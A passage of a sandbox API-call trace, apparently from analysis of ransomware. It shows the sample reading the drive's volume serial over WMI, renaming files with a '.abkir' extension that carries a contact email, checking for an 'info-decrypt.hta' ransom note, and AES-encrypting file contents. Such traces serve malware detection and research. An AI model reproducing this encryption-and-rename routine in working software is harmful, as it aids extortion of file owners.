riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f21c | out: ppvObject=0x691f21c*=0x0) returned 0x80004002 [0206.664] IUnknown:Release (This=0xb51e34) returned 0x1 [0206.665] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691ee40 | out: ppv=0x691ee40*=0x6024938) returned 0x0 [0206.665] WbemLocator:IUnknown:QueryInterface (in: This=0x6024938, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691f058 | out: ppvObject=0x691f058*=0x0) returned 0x80004002 [0206.665] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024938, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691f06c | out: ppvObject=0x691f06c*=0x60273e0) returned 0x0 [0206.665] WbemLocator:IUnknown:Release (This=0x6024938) returned 0x0 [0206.665] WbemLocator:IUnknown:QueryInterface (in: This=0x60273e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ec8c | out: ppvObject=0x691ec8c*=0x60273e0) returned 0x0 [0206.665] WbemLocator:IUnknown:QueryInterface (in: This=0x60273e0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691ec48 | out: ppvObject=0x691ec48*=0x0) returned 0x80004002 [0206.665] WbemLocator:IUnknown:AddRef (This=0x60273e0) returned 0x3 [0206.665] WbemLocator:IUnknown:QueryInterface (in: This=0x60273e0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e5a4 | out: ppvObject=0x691e5a4*=0x0) returned 0x80004002 [0206.665] WbemLocator:IUnknown:QueryInterface (in: This=0x60273e0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e554 | out: ppvObject=0x691e554*=0x0) returned 0x80004002 [0206.665] WbemLocator:IUnknown:QueryInterface (in: This=0x60273e0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e560 | out: ppvObject=0x691e560*=0x0) returned 0x80004002 [0206.665] CoGetContextToken (in: pToken=0x691e5c0 | out: pToken=0x691e5c0) returned 0x0 [0206.665] CoGetContextToken (in: pToken=0x691e9c8 | out: pToken=0x691e9c8) returned 0x0 [0206.665] WbemLocator:IUnknown:QueryInterface (in: This=0x60273e0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ea58 | out: ppvObject=0x691ea58*=0x0) returned 0x80004002 [0206.666] WbemLocator:IUnknown:Release (This=0x60273e0) returned 0x2 [0206.666] WbemLocator:IUnknown:Release (This=0x60273e0) returned 0x1 [0206.666] CoGetContextToken (in: pToken=0x691f038 | out: pToken=0x691f038) returned 0x0 [0206.666] CoGetContextToken (in: pToken=0x691ef98 | out: pToken=0x691ef98) returned 0x0 [0206.666] WbemLocator:IUnknown:QueryInterface (in: This=0x60273e0, riid=0x691f068*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x691f064 | out: ppvObject=0x691f064*=0x60273e0) returned 0x0 [0206.666] WbemLocator:IUnknown:AddRef (This=0x60273e0) returned 0x3 [0206.666] WbemLocator:IUnknown:Release (This=0x60273e0) returned 0x2 [0206.666] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ff0, puCount=0x691f1fc | out: puCount=0x691f1fc*=0x2) returned 0x0 [0206.666] WbemDefPath:IWbemPath:GetText (in: This=0x6029ff0, lFlags=8, puBuffLength=0x691f1f8*=0x0, pszText=0x0 | out: puBuffLength=0x691f1f8*=0xf, pszText=0x0) returned 0x0 [0206.666] WbemDefPath:IWbemPath:GetText (in: This=0x6029ff0, lFlags=8, puBuffLength=0x691f1f8*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f1f8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0206.666] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x691f0d4 | out: ppv=0x691f0d4*=0x6027370) returned 0x0 [0206.666] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027370, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x691f168 | out: ppNamespace=0x691f168*=0x6033844) returned 0x0 [0206.827] WbemLocator:IUnknown:QueryInterface (in: This=0x6033844, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691f004 | out: ppvObject=0x691f004*=0xb5b224) returned 0x0 [0206.827] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b224, pProxy=0x6033844, pAuthnSvc=0x691f054, pAuthzSvc=0x691f050, pServerPrincName=0x691f048, pAuthnLevel=0x691f04c, pImpLevel=0x691f03c, pAuthInfo=0x691f040, pCapabilites=0x691f044 | out: pAuthnSvc=0x691f054*=0xa, pAuthzSvc=0x691f050*=0x0, pServerPrincName=0x691f048, pAuthnLevel=0x691f04c*=0x6, pImpLevel=0x691f03c*=0x2, pAuthInfo=0x691f040, pCapabilites=0x691f044*=0x1) returned 0x0 [0206.827] WbemLocator:IUnknown:Release (This=0xb5b224) returned 0x1 [0206.827] WbemLocator:IUnknown:QueryInterface (in: This=0x6033844, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691eff8 | out: ppvObject=0x691eff8*=0xb5b244) returned 0x0 [0206.827] WbemLocator:IUnknown:QueryInterface (in: This=0x6033844, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691eff4 | out: ppvObject=0x691eff4*=0xb5b224) returned 0x0 [0206.827] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b224, pProxy=0x6033844, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0206.828] WbemLocator:IUnknown:Release (This=0xb5b224) returned 0x2 [0206.828] WbemLocator:IUnknown:Release (This=0xb5b244) returned 0x1 [0206.828] CoTaskMemFree (pv=0xbd4a68) [0206.828] WbemLocator:IUnknown:Release (This=0x6027370) returned 0x0 [0206.828] WbemLocator:IUnknown:QueryInterface (in: This=0x6033844, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ebf4 | out: ppvObject=0x691ebf4*=0xb5b244) returned 0x0 [0206.828] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691ebb0 | out: ppvObject=0x691ebb0*=0x0) returned 0x80004002 [0206.828] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691e9cc | out: ppvObject=0x691e9cc*=0x0) returned 0x80004002 [0206.829] WbemLocator:IUnknown:AddRef (This=0xb5b244) returned 0x3 [0206.829] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e50c | out: ppvObject=0x691e50c*=0x0) returned 0x80004002 [0206.829] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e4bc | out: ppvObject=0x691e4bc*=0x0) returned 0x80004002 [0206.829] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e4c8 | out: ppvObject=0x691e4c8*=0xb5b1a4) returned 0x0 [0206.829] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b1a4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e4d0 | out: pCid=0x691e4d0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0206.829] WbemLocator:IUnknown:Release (This=0xb5b1a4) returned 0x3 [0206.829] CoGetContextToken (in: pToken=0x691e528 | out: pToken=0x691e528) returned 0x0 [0206.830] CoGetContextToken (in: pToken=0x691e930 | out: pToken=0x691e930) returned 0x0 [0206.830] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e9c0 | out: ppvObject=0x691e9c0*=0xb5b22c) returned 0x0 [0206.830] WbemLocator:IRpcOptions:Query (in: This=0xb5b22c, pPrx=0xb5b244, dwProperty=2, pdwValue=0x691e9e8 | out: pdwValue=0x691e9e8) returned 0x80004002 [0206.830] WbemLocator:IUnknown:Release (This=0xb5b22c) returned 0x3 [0206.830] WbemLocator:IUnknown:Release (This=0xb5b244) returned 0x2 [0206.830] CoGetContextToken (in: pToken=0x691ef08 | out: pToken=0x691ef08) returned 0x0 [0206.830] CoGetContextToken (in: pToken=0x691ee68 | out: pToken=0x691ee68) returned 0x0 [0206.830] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x691ef38*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x691ef34 | out: ppvObject=0x691ef34*=0x6033844) returned 0x0 [0206.830] WbemLocator:IUnknown:AddRef (This=0x6033844) returned 0x4 [0206.830] WbemLocator:IUnknown:Release (This=0x6033844) returned 0x3 [0206.830] WbemLocator:IUnknown:Release (This=0x6033844) returned 0x2 [0206.830] SysStringLen (param_1=0x0) returned 0x0 [0206.830] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ce0, puCount=0x691f2cc | out: puCount=0x691f2cc*=0x0) returned 0x0 [0206.830] WbemDefPath:IWbemPath:GetText (in: This=0x6029ce0, lFlags=2, puBuffLength=0x691f2c8*=0x0, pszText=0x0 | out: puBuffLength=0x691f2c8*=0x20, pszText=0x0) returned 0x0 [0206.830] WbemDefPath:IWbemPath:GetText (in: This=0x6029ce0, lFlags=2, puBuffLength=0x691f2c8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f2c8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0206.830] CoGetContextToken (in: pToken=0x691ef38 | out: pToken=0x691ef38) returned 0x0 [0206.830] WbemLocator:IUnknown:AddRef (This=0xb5b244) returned 0x3 [0206.830] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691edcc | out: ppvObject=0x691edcc*=0xb5b244) returned 0x0 [0206.830] WbemLocator:IUnknown:Release (This=0xb5b244) returned 0x3 [0206.830] WbemLocator:IUnknown:Release (This=0xb5b244) returned 0x2 [0206.831] WbemDefPath:IWbemPath:GetText (in: This=0x6029ce0, lFlags=2, puBuffLength=0x691f2d0*=0x0, pszText=0x0 | out: puBuffLength=0x691f2d0*=0x20, pszText=0x0) returned 0x0 [0206.831] WbemDefPath:IWbemPath:GetText (in: This=0x6029ce0, lFlags=2, puBuffLength=0x691f2d0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f2d0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0206.831] IWbemServices:GetObject (in: This=0x6033844, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x691f284*=0x0, ppCallResult=0x0 | out: ppObject=0x691f284*=0x6027fe8, ppCallResult=0x0) returned 0x0 [0207.232] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ff0, puCount=0x691f284 | out: puCount=0x691f284*=0x2) returned 0x0 [0207.232] WbemDefPath:IWbemPath:GetText (in: This=0x6029ff0, lFlags=4, puBuffLength=0x691f280*=0x0, pszText=0x0 | out: puBuffLength=0x691f280*=0xf, pszText=0x0) returned 0x0 [0207.232] WbemDefPath:IWbemPath:GetText (in: This=0x6029ff0, lFlags=4, puBuffLength=0x691f280*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f280*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0207.232] IWbemClassObject:Get (in: This=0x6027fe8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x691f280*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x397c058*=0, plFlavor=0x397c05c*=0 | out: pVal=0x691f280*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x397c058*=8, plFlavor=0x397c05c*=0) returned 0x0 [0207.232] SysStringByteLen (bstr="9C354B42") returned 0x10 [0207.232] SysStringByteLen (bstr="9C354B42") returned 0x10 [0207.233] IWbemClassObject:Get (in: This=0x6027fe8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x691f288*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x397c058*=8, plFlavor=0x397c05c*=0 | out: pVal=0x691f288*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x397c058*=8, plFlavor=0x397c05c*=0) returned 0x0 [0207.233] SysStringByteLen (bstr="9C354B42") returned 0x10 [0207.233] SysStringByteLen (bstr="9C354B42") returned 0x10 [0207.233] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico", nBufferLength=0x105, lpBuffer=0x691ee88, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico", lpFilePart=0x0) returned 0x31 [0207.233] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x691ee88, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x54 [0207.233] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2e8) returned 1 [0207.233] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico"), fInfoLevelId=0x0, lpFileInformation=0x691f364 | out: lpFileInformation=0x691f364*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2bfbd800, ftCreationTime.dwHighDateTime=0x1c9facb, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x34da5800, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0207.233] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2e4) returned 1 [0207.233] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico"), lpNewFileName="C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0207.234] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico", nBufferLength=0x105, lpBuffer=0x691eea0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico", lpFilePart=0x0) returned 0x2a [0207.234] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691eea8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\info-decrypt.hta", lpFilePart=0x0) returned 0x30 [0207.234] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f308) returned 1 [0207.234] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\office\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f384 | out: lpFileInformation=0x691f384*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x32cea980, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x32cea980, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x32cea980, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0207.234] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f304) returned 1 [0207.234] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico", nBufferLength=0x105, lpBuffer=0x691eea8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico", lpFilePart=0x0) returned 0x2a [0207.234] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f354) returned 1 [0207.235] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysite.ico"), fInfoLevelId=0x0, lpFileInformation=0x397c514 | out: lpFileInformation=0x397c514*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc92d1d00, ftCreationTime.dwHighDateTime=0x1c627a2, ftLastAccessTime.dwLowDateTime=0x594ac510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc92d1d00, ftLastWriteTime.dwHighDateTime=0x1c627a2, nFileSizeHigh=0x0, nFileSizeLow=0x627e)) returned 1 [0207.235] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f350) returned 1 [0207.235] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico", nBufferLength=0x105, lpBuffer=0x691ed94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico", lpFilePart=0x0) returned 0x2a [0207.235] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f288) returned 1 [0207.235] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysite.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0207.235] GetFileType (hFile=0x31c) returned 0x1 [0207.235] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f284) returned 1 [0207.235] GetFileType (hFile=0x31c) returned 0x1 [0207.235] GetFileSize (in: hFile=0x31c, lpFileSizeHigh=0x691f390 | out: lpFileSizeHigh=0x691f390*=0x0) returned 0x627e [0207.236] ReadFile (in: hFile=0x31c, lpBuffer=0x397c6b4, nNumberOfBytesToRead=0x627e, lpNumberOfBytesRead=0x691f33c, lpOverlapped=0x0 | out: lpBuffer=0x397c6b4*, lpNumberOfBytesRead=0x691f33c*=0x627e, lpOverlapped=0x0) returned 1 [0207.238] CloseHandle (hObject=0x31c) returned 1 [0207.238] CryptAcquireContextW (in: phProv=0x691f2dc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f2dc*=0xbdfd88) returned 1 [0207.239] CryptGenRandom (in: hProv=0xbdfd88, dwLen=0x10, pbBuffer=0x3982ff8 | out: pbBuffer=0x3982ff8) returned 1 [0207.509] CryptImportKey (in: hProv=0xbdfd88, pbData=0x3708aec, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f2ac | out: phKey=0x691f2ac*=0xb7f510) returned 1 [0207.509] CryptContextAddRef (hProv=0xbdfd88, pdwReserved=0x0, dwFlags=0x0) returned 1 [0207.510] CryptContextAddRef (hProv=0xbdfd88, pdwReserved=0x0, dwFlags=0x0) returned 1 [0207.510] CryptDuplicateKey (in: hKey=0xb7f510, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f29c | out: phKey=0x691f29c*=0xb7f850) returned 1 [0207.510] CryptContextAddRef (hProv=0xbdfd88, pdwReserved=0x0, dwFlags=0x0) returned 1 [0207.510] CryptSetKeyParam (hKey=0xb7f850, dwParam=0x4, pbData=0x3708bcc*=0x1, dwFlags=0x0) returned 1 [0207.510] CryptSetKeyParam (hKey=0xb7f850, dwParam=0x1, pbData=0x3708b98, dwFlags=0x0) returned 1 [0207.510] CryptEncrypt (in: hKey=0xb7f850, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3708bdc*, pdwDataLen=0x691f308*=0x6280, dwBufLen=0x6280 | out: pbData=0x3708bdc*, pdwDataLen=0x691f308*=0x6280) returned 1 [0207.510] CryptEncrypt (in: hKey=0xb7f850, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x370ee80*, pdwDataLen=0x691f310*=0x0, dwBufLen=0x10 | out: pbData=0x370ee80*, pdwDataLen=0x691f310*=0x10) returned 1 [0207.511] CryptDestroyKey (hKey=0xb7f510) returned 1 [0207.511] CryptReleaseContext (hProv=0xbdfd88, dwFlags=0x0) returned 1 [0207.511] CryptReleaseContext (hProv=0xbdfd88, dwFlags=0x0) returned 1 [0207.511] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico", nBufferLength=0x105, lpBuffer=0x691ed80, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico", lpFilePart=0x0) returned 0x2a [0207.511] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f274) returned 1 [0207.512] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysite.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x208 [0207.512] GetFileType (hFile=0x208) returned 0x1 [0207.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f270) returned 1 [0207.512] GetFileType (hFile=0x208) returned 0x1 [0207.512] WriteFile (in: hFile=0x208, lpBuffer=0x370f46c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x691f304, lpOverlapped=0x0 | out: lpBuffer=0x370f46c*, lpNumberOfBytesWritten=0x691f304*=0x20, lpOverlapped=0x0) returned 1 [0207.532] CloseHandle (hObject=0x208) returned 1 [0207.532] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0207.532] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0207.532] CoTaskMemFree (pv=0xbed438) [0207.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x691ed68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0207.532] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f2b0 | out: ppv=0x691f2b0*=0xb51e34) returned 0x0 [0207.532] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f2a8 | out: pAptType=0x691f2a8*=1) returned 0x0 [0207.532] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f2ac | out: ppvObject=0x691f2ac*=0x0) returned 0x80004002 [0207.533] IUnknown:Release (This=0xb51e34) returned 0x1 [0207.533] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691ec18 | out: ppv=0x691ec18*=0x6027250) returned 0x0 [0207.533] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027250, riid=0x74ae0ae0*(Data1=0xb196b28f, 